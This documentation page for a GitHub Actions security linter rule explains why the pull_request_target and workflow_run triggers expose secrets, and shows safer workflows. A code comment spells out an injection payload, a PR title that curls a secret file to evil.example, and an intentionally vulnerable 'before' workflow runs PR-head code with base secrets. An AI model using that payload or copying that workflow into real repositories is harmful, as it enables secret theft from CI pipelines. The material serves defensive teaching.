ISSUE-802 Critical Medium CLI Workflow triggers and permissions

Workflow subscribes to a dangerous trigger

Control: Workflow must not use dangerous triggers · Config key: workflowMustNotUseDangerousTriggers

📋 What is this?

A workflow subscribes to pull_request_target or workflow_run. Both events run in the context of the base repository: the workflow definition is taken from the base branch, the secrets context is populated, and GITHUB_TOKEN is write-capable unless the workflow or the repository's default restricts it. That holds even when the event was caused by a pull request from a fork, which is exactly the case pull_request protects against (a fork PR under pull_request gets a read-only token and no repository secrets).

⚠️ Impact

These triggers are a recurring factor in the highest-impact GitHub Actions incidents of recent years (tj-actions, reviewdog, Ultralytics). With secrets and a write token in scope, a single expression (template) injection of a PR-controlled field, or a checkout of the PR head followed by a build or test step, lets the PR author run code that reads every secret the workflow can reach and can push to the repository with the token.

🔧 How to fix

Use the pull_request trigger where possible: on a fork PR it runs with a read-only GITHUB_TOKEN and no repository secrets, so PR-author code has nothing to steal. If pull_request_target is genuinely necessary, confine it to non-code activities (labeling, commenting, triage), set an explicit minimal permissions block, pass any PR-controlled field (title, body, branch name) to scripts through env rather than inline ${{ }} expressions, and never check out the PR's head (see ISSUE-804).

✗ Before: PR-author code executes with the base repo's secrets and GITHUB_TOKEN.

```yaml
# .github/workflows/welcome.yml — ❌ pull_request_target with full repo access
on: pull_request_target
jobs:
  welcome:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }} # ISSUE-804
      - run: ./run-tests.sh # PR-author code with base secrets
```

✓ After: forks see read-only access; no secret exfiltration path.

```yaml
# .github/workflows/welcome.yml — ✅ pull_request (no secrets on forks)
on: pull_request
permissions:
  contents: read
jobs:
  welcome:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
      - run: ./run-tests.sh
```

```yaml
# .plumber.yaml
github:
  controls:
    workflowMustNotUseDangerousTriggers:
      enabled: true
      allowedTriggers: []
```
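For the case where pull_request_target cannot be avoided, the following workflow shows the constrained shape described above: a non-code task (labeling), an explicit minimal permissions block, no checkout at all, and every PR-controlled field handed to the script via env. This is an added example, not code from the page or from the plumber project; the file name, label names and the size threshold are illustrative assumptions, and the size/large and size/small labels are assumed to already exist in the repository.

```yaml
# .github/workflows/label.yml -- pull_request_target kept to a non-code task (added example)
name: label
on:
  pull_request_target:
    types: [opened, synchronize]
permissions:
  pull-requests: write   # the only permission labeling needs; everything else is read-only
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      # Deliberately no actions/checkout: nothing from the PR branch is ever on disk,
      # so there is no PR-author code to execute with the base repo's secrets.
      - name: Label by size
        env:
          # Untrusted PR fields enter the script as environment variables, not as
          # inline ${{ }} expressions. The anti-pattern would be:
          #   run: echo "Title: ${{ github.event.pull_request.title }}"
          # where a PR titled  x"; curl https://evil.example/$(cat ~/.config/secret)  runs as code.
          PR_NUMBER: ${{ github.event.pull_request.number }}
          PR_TITLE: ${{ github.event.pull_request.title }}
          CHANGED_FILES: ${{ github.event.pull_request.changed_files }}
          GH_REPO: ${{ github.repository }}           # gh has no checkout to infer the repo from
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          set -euo pipefail
          echo "Labeling PR #${PR_NUMBER}: ${PR_TITLE}"   # printing a variable is safe; expanding it inline is not
          if [ "${CHANGED_FILES}" -gt 50 ]; then
            label=size/large
          else
            label=size/small
          fi
          gh pr edit "${PR_NUMBER}" --add-label "${label}"
```

The run step never touches the PR's files and never interpolates PR content into the script text, so the remaining blast radius is bounded by the single pull-requests: write permission. Pin gh-driven steps to a SHA-pinned checkout-free job like this one rather than bolting a checkout on later; adding `actions/checkout` with the PR head ref would reintroduce ISSUE-804.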

💡 Tips

  • If you genuinely need PR-comment automation, split the work: a pull_request workflow (no secrets on forks) uploads its results as an artifact; a separate workflow_run workflow with a restrictive permissions block downloads and consumes them. Treat the artifact as untrusted input from the PR author: never execute anything in it, and verify that any PR number it carries really belongs to the run that produced it before acting on it.
  • Pair with ISSUE-804 for the explicit head-checkout anti-pattern and ISSUE-305 for the environment-gate side.
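The split described in the first tip, written out as two workflows in one YAML stream. This is an added example and not code from the page or from the plumber project; the workflow and artifact names are assumptions, and actions/upload-artifact and actions/download-artifact are referenced by their v4 tags here, which you should pin to commit SHAs as the page does for actions/checkout. The consumer relies on download-artifact v4's run-id and github-token inputs to fetch another run's artifact.

```yaml
# .github/workflows/pr-results.yml -- producer: runs PR-author code WITHOUT secrets (added example)
name: pr-results
on: pull_request
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
      # PR-author code runs here, but the fork PR has a read-only token and no repo secrets.
      - run: ./run-tests.sh | tee results.txt
      # The PR number is a plain integer from the event payload; the consumer re-validates it.
      - run: echo "${{ github.event.pull_request.number }}" > pr-number.txt
      - uses: actions/upload-artifact@v4
        with:
          name: pr-results
          path: |
            results.txt
            pr-number.txt
---
# .github/workflows/pr-comment.yml -- consumer: runs in the base context WITH secrets (added example)
name: pr-comment
on:
  workflow_run:
    workflows: [pr-results]
    types: [completed]
permissions:
  actions: read          # needed to download the producer run's artifact
  pull-requests: write   # needed to post the comment; nothing else is granted
jobs:
  comment:
    # Only react to successful runs that the producer started from a pull_request event.
    if: >-
      github.event.workflow_run.event == 'pull_request' &&
      github.event.workflow_run.conclusion == 'success'
    runs-on: ubuntu-latest
    steps:
      # No checkout: the PR's code is never on this runner.
      - uses: actions/download-artifact@v4
        with:
          name: pr-results
          run-id: ${{ github.event.workflow_run.id }}
          github-token: ${{ secrets.GITHUB_TOKEN }}
      - name: Validate the artifact (it was produced by untrusted code)
        id: check
        env:
          GH_REPO: ${{ github.repository }}
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          HEAD_SHA: ${{ github.event.workflow_run.head_sha }}
        run: |
          set -euo pipefail
          # Keep only digits: the PR author wrote this file and could have put anything in it.
          pr=$(tr -cd '0-9' < pr-number.txt)
          [ -n "${pr}" ] || { echo "artifact carries no PR number"; exit 1; }
          # The PR the artifact names must be the PR whose head commit this run was triggered for;
          # otherwise a fork could point the comment (and the write permission) at someone else's PR.
          api_sha=$(gh api "repos/${GH_REPO}/pulls/${pr}" --jq .head.sha)
          [ "${api_sha}" = "${HEAD_SHA}" ] || { echo "PR ${pr} does not match run head ${HEAD_SHA}"; exit 1; }
          echo "pr=${pr}" >> "${GITHUB_OUTPUT}"
      - name: Post results
        env:
          GH_REPO: ${{ github.repository }}
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          PR: ${{ steps.check.outputs.pr }}
        run: gh pr comment "${PR}" --body-file results.txt   # displayed as text, never executed
```

results.txt is still attacker-controlled content, but it is only ever passed as a comment body; nothing in the artifact is sourced, unpacked into the workspace, or run. If the validation step fails the consumer stops before any write, which is the fail-closed behaviour you want from the privileged half of the split.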

⚙️ Configuration

This control is configured in .plumber.yaml under the github section:

github:
  controls:
    workflowMustNotUseDangerousTriggers:
      enabled: true

See the CLI documentation for the full configuration reference.